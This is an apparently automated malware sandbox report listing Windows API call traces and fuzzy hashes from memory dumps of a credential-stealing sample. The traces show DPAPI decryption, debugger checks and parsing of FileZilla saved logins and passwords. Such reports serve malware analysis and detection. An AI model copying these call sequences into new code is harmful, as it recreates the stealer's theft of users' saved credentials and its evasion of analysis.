                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                  • String ID:
                                                                                  • API String ID: 2579439406-0
                                                                                  • Opcode ID: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                                                                  • Instruction ID: 2759986af63cf1bc905e0f8428f5e2b998159022a12c47e0d709fe691c65c3be
                                                                                  • Opcode Fuzzy Hash: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                                                                  • Instruction Fuzzy Hash: E921A3BC9002059FDB10DF69FD89A963BE4FB0A314F50403AE90A87264DBB45981EF4D
                                                                                  APIs
                                                                                  • IsDebuggerPresent.KERNEL32 ref: 00B1BE09
                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00B1BE1E
                                                                                  • UnhandledExceptionFilter.KERNEL32(0041F2A8), ref: 00B1BE29
                                                                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 00B1BE45
                                                                                  • TerminateProcess.KERNEL32(00000000), ref: 00B1BE4C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                  • String ID:
                                                                                  • API String ID: 2579439406-0
                                                                                  • Opcode ID: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                                                                  • Instruction ID: 8e48c42ad0c0d9f18b2bc52178ca3c19e8ba6d70f618b740240eae73afacb578
                                                                                  • Opcode Fuzzy Hash: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                                                                  • Instruction Fuzzy Hash: E421A3BC9002059FDB14DF69F889A963BF4FB0A314F50447AE90987265EBB05981EF49
                                                                                  APIs
                                                                                  • GetProcessHeap.KERNEL32(00000008,00000400,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90), ref: 0040724D
                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407254
                                                                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00407281
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000,?,?,?,?,?,00407C90,80000001,004161C4), ref: 004072A4
                                                                                  • LocalFree.KERNEL32(?,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 004072AE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                                                                  • String ID:
                                                                                  • API String ID: 3657800372-0
                                                                                  • Opcode ID: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                                                                  • Instruction ID: ec186dc502c88c98e3638293fff085d95328f9e4ca1f8ca95b137b7d6c986ae9
                                                                                  • Opcode Fuzzy Hash: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                                                                  • Instruction Fuzzy Hash: 900100B5A80208BBEB10DFD4DD45F9E77B9EB44704F104159FB05BA2C0D674AA018B66
                                                                                  APIs
                                                                                  • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00B074B4
                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B074BB
                                                                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00B074E8
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00B0750B
                                                                                  • LocalFree.KERNEL32(?), ref: 00B07515
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                                                                  • String ID:
                                                                                  • API String ID: 2609814428-0
                                                                                  • Opcode ID: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                                                                  • Instruction ID: 6221579ed3f09a54ec221126d739e51f4bb317734c51ffa3031d7b137c665453
                                                                                  • Opcode Fuzzy Hash: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                                                                  • Instruction Fuzzy Hash: 8D010075A80208BBEB10DFD4DD45F9D77B9EB45704F104155F705AA2C0DA70AA018B65
                                                                                  APIs
                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041961E
                                                                                  • Process32First.KERNEL32(00420ACA,00000128), ref: 00419632
                                                                                  • Process32Next.KERNEL32(00420ACA,00000128), ref: 00419647
                                                                                  • StrCmpCA.SHLWAPI(?,00000000), ref: 0041965C
                                                                                  • CloseHandle.KERNEL32(00420ACA), ref: 0041967A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                  • String ID:
                                                                                  • API String ID: 420147892-0
                                                                                  • Opcode ID: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                                                                  • Instruction ID: 11d567adce4b572477f284a2ec541547db87c4b6fd8ba8cb36d7f0fd64301d48
                                                                                  • Opcode Fuzzy Hash: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                                                                  • Instruction Fuzzy Hash: F201E9B9A40208ABCB24DFA5C958BEEB7F9EB49700F104189E90996250D7389F81CF61
                                                                                  APIs
                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00B19885
                                                                                  • Process32First.KERNEL32(00420ACA,00000128), ref: 00B19899
                                                                                  • Process32Next.KERNEL32(00420ACA,00000128), ref: 00B198AE
                                                                                  • StrCmpCA.SHLWAPI(?,00000000), ref: 00B198C3
                                                                                  • CloseHandle.KERNEL32(00420ACA), ref: 00B198E1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                  • String ID:
                                                                                  • API String ID: 420147892-0
                                                                                  • Opcode ID: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                                                                  • Instruction ID: f368e4e38eef127faf7fb44b25c18d94de5b49ea479ae73d28985b45ccef5c56
                                                                                  • Opcode Fuzzy Hash: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                                                                  • Instruction Fuzzy Hash: B7012979A40208FBCB20DFA4C894BEDB7F9EB09740F004189A505A6240D7749A80CF51
                                                                                  APIs
                                                                                    • Part of subcall function 00B1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B1A9EF
                                                                                    • Part of subcall function 00B1AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B1ABD9
                                                                                    • Part of subcall function 00B1AB87: lstrcat.KERNEL32(00000000), ref: 00B1ABE9
                                                                                    • Part of subcall function 00B1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B1AC2C
                                                                                    • Part of subcall function 00B1AC17: lstrcpy.KERNEL32(00000000), ref: 00B1AC6B
                                                                                    • Part of subcall function 00B1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AC79
                                                                                    • Part of subcall function 00B1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B1AB6C
                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214F0,00420D73), ref: 00B0E709
                                                                                  • StrCmpCA.SHLWAPI(?,004214F8), ref: 00B0E759
                                                                                  • StrCmpCA.SHLWAPI(?,004214FC), ref: 00B0E76F
                                                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00B0EE46
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 433455689-0
                                                                                  • Opcode ID: f3dcec5693a34f3f639a4326c9ab4e832b2dce632252e8eb0e6dc656e0f1fa1e
                                                                                  • Instruction ID: 44066117c1e4da54f60b63f46a0c5f7ad3263372fdc454174fa9dbc612b3b458
                                                                                  • Opcode Fuzzy Hash: f3dcec5693a34f3f639a4326c9ab4e832b2dce632252e8eb0e6dc656e0f1fa1e
                                                                                  • Instruction Fuzzy Hash: 9712ED71A112189BCB18FB60DD96EED77B9AF54700F8045EDB50A62091EE346FC8CF92
                                                                                  APIs
                                                                                  • CryptBinaryToStringA.CRYPT32(00000000,00405184,40000001,00000000,00000000,?,00405184), ref: 00418EC0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: BinaryCryptString
                                                                                  • String ID:
                                                                                  • API String ID: 80407269-0
                                                                                  • Opcode ID: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                                                                  • Instruction ID: 3c4cb89ba01459054e3b3595e947631781f59a96386c3a2a773972b879479806
                                                                                  • Opcode Fuzzy Hash: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                                                                  • Instruction Fuzzy Hash: 62111C74200204BFDB00CFA4D884FA733AAAF89304F109549F9198B250DB39EC82DB65
                                                                                  APIs
                                                                                  • CryptBinaryToStringA.CRYPT32(00000000,00B053EB,40000001,00000000,00000000,?,00B053EB), ref: 00B19127
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: BinaryCryptString
                                                                                  • String ID:
                                                                                  • API String ID: 80407269-0
                                                                                  • Opcode ID: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                                                                  • Instruction ID: 5442f52c6bc664851ad4294be274c14147e88e4776a4c7ee3c2fc125775f4202
                                                                                  • Opcode Fuzzy Hash: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                                                                  • Instruction Fuzzy Hash: AD113A74204245BFDB00CF94D898FA733EAEF8A740F509598F9098B254C771E8D2DB60
                                                                                  APIs
                                                                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00B05155,00000000,00000000), ref: 00B09D56
                                                                                  • LocalAlloc.KERNEL32(00000040,?,?,?,00B05155,00000000,?), ref: 00B09D68
                                                                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00B05155,00000000,00000000), ref: 00B09D91
                                                                                  • LocalFree.KERNEL32(?,?,?,?,00B05155,00000000,?), ref: 00B09DA6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: BinaryCryptLocalString$AllocFree
                                                                                  • String ID:
                                                                                  • API String ID: 4291131564-0
                                                                                  • Opcode ID: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                                                                  • Instruction ID: 6a31b7674025dcbaddbbc35abfd327d460f778edfa8e82fd9b1e99cc97f55c67
                                                                                  • Opcode Fuzzy Hash: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                                                                  • Instruction Fuzzy Hash: 2E1162B4641208EFEB10CFA4C895BAA77A5EB89714F208158FD159B394C676A941CB90
                                                                                  APIs
                                                                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B84
                                                                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BA3
                                                                                  • memcpy.MSVCRT(?,?,?), ref: 00409BC6
                                                                                  • LocalFree.KERNEL32(?), ref: 00409BD3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                                                                  • String ID:
                                                                                  • API String ID: 3243516280-0
                                                                                  • Opcode ID: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                                                                  • Instruction ID: 8471c3d920f6d21a6ca128c50317bdd839bed9d1cf50ed0ddd6ab59e3c77a746
                                                                                  • Opcode Fuzzy Hash: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                                                                  • Instruction Fuzzy Hash: 46110CB8A00209EFDB04DF94D985AAE77B6FF89300F104569F915A7390D774AE10CF61
                                                                                  APIs
                                                                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00B09DEB
                                                                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 00B09E0A
                                                                                  • memcpy.MSVCRT(?,?,?), ref: 00B09E2D
                                                                                  • LocalFree.KERNEL32(?), ref: 00B09E3A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                                                                  • String ID:
                                                                                  • API String ID: 3243516280-0
                                                                                  • Opcode ID: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                                                                  • Instruction ID: 3e6183e62467ac28c6c9c6c7202be2e3e98fbc7de55b32e9cbc4556deb278052
                                                                                  • Opcode Fuzzy Hash: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                                                                  • Instruction Fuzzy Hash: 3D11FAB8A00209EFDB04CFA4D989AAE77F5FF89300F108558E91597390D730AE10CF61
                                                                                  APIs
                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00909EF0,00000000,?,00420E10,00000000,?,00000000,00000000), ref: 00417A63
                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,00909EF0,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00417A6A
                                                                                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00909EF0,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00417A7D
                                                                                  • wsprintfA.USER32 ref: 00417AB7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                                  • String ID:
                                                                                  • API String ID: 362916592-0
                                                                                  • Opcode ID: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                                                                  • Instruction ID: 8af700d3b0e32b47e9d6ddd9198ddf9a5cfc8e3ba9127fd648bfb7377b14e362
                                                                                  • Opcode Fuzzy Hash: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                                                                  • Instruction Fuzzy Hash: 461152B1A45228EFEB108B54DC45F9AB7B8FB05711F10439AE516932C0D7785A40CF55
                                                                                  APIs
                                                                                  • CoCreateInstance.COMBASE(0041E118,00000000,00000001,0041E108,00000000), ref: 00413758
                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 004137B0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ByteCharCreateInstanceMultiWide
                                                                                  • String ID:
                                                                                  • API String ID: 123533781-0
                                                                                  • Opcode ID: 634e478c758f94cb0cd26d84ba9f3abb63f0756ecf75599706a634363863d21a
                                                                                  • Instruction ID: 95f6a265596bdc049295610fa53daf8ef9ce5e7415083cbf30a8e52d2e28a0c3
                                                                                  • Opcode Fuzzy Hash: 634e478c758f94cb0cd26d84ba9f3abb63f0756ecf75599706a634363863d21a
                                                                                  • Instruction Fuzzy Hash: A941F474A40A28AFDB24DF58CC94BDAB7B5BB48306F4041D9A608A72D0E771AEC5CF50
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: free
                                                                                  • String ID:
                                                                                  • API String ID: 1294909896-0
                                                                                  • Opcode ID: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                                                                  • Instruction ID: a4127c69f0ed00ed12e14b53f80e32f4a83f120d49244834c8a2f7babfbe096b
                                                                                  • Opcode Fuzzy Hash: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                                                                  • Instruction Fuzzy Hash: 2A71C231452F40DBD7633B31ED03EC976EA7F04702F9049B4B1D729D729A2278E99A52
                                                                                  APIs
                                                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                    • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                                                    • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                                                    • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                                                    • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                                                    • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                                                    • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                                                    • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                                                    • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                                                                  • strtok_s.MSVCRT ref: 0041031B
                                                                                  • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBA,00420DB7,00420DB6,00420DB3), ref: 00410362
                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410369
                                                                                  • StrStrA.SHLWAPI(00000000,<Host>), ref: 00410385
                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00410393
                                                                                    • Part of subcall function 004188E0: malloc.MSVCRT ref: 004188E8
                                                                                    • Part of subcall function 004188E0: strncpy.MSVCRT ref: 00418903
                                                                                  • StrStrA.SHLWAPI(00000000,<Port>), ref: 004103CF
                                                                                  • lstrlenA.KERNEL32(00000000), ref: 004103DD
                                                                                  • StrStrA.SHLWAPI(00000000,<User>), ref: 00410419
                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00410427
                                                                                  • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00410463
                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00410475
                                                                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410502
                                                                                  • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041051A
                                                                                  • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 00410532
                                                                                  • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041054A
                                                                                  • lstrcatA.KERNEL32(?,browser: FileZilla,?,?,00000000), ref: 00410562
                                                                                  • lstrcatA.KERNEL32(?,profile: null,?,?,00000000), ref: 00410571
                                                                                  • lstrcatA.KERNEL32(?,url: ,?,?,00000000), ref: 00410580
                                                                                  • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410593
                                                                                  • lstrcatA.KERNEL32(?,00421678,?,?,00000000), ref: 004105A2
                                                                                  • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004105B5
                                                                                  • lstrcatA.KERNEL32(?,0042167C,?,?,00000000), ref: 004105C4
                                                                                  • lstrcatA.KERNEL32(?,login: ,?,?,00000000), ref: 004105D3
                                                                                  • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004105E6
                                                                                  • lstrcatA.KERNEL32(?,00421688,?,?,00000000), ref: 004105F5
                                                                                  • lstrcatA.KERNEL32(?,password: ,?,?,00000000), ref: 00410604
                                                                                  • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410617
                                                                                  • lstrcatA.KERNEL32(?,00421698,?,?,00000000), ref: 00410626
                                                                                  • lstrcatA.KERNEL32(?,0042169C,?,?,00000000), ref: 00410635
                                                                                  • strtok_s.MSVCRT ref: 00410679
                                                                                  • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 0041068E
                                                                                  • memset.MSVCRT ref: 004106DD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$CloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
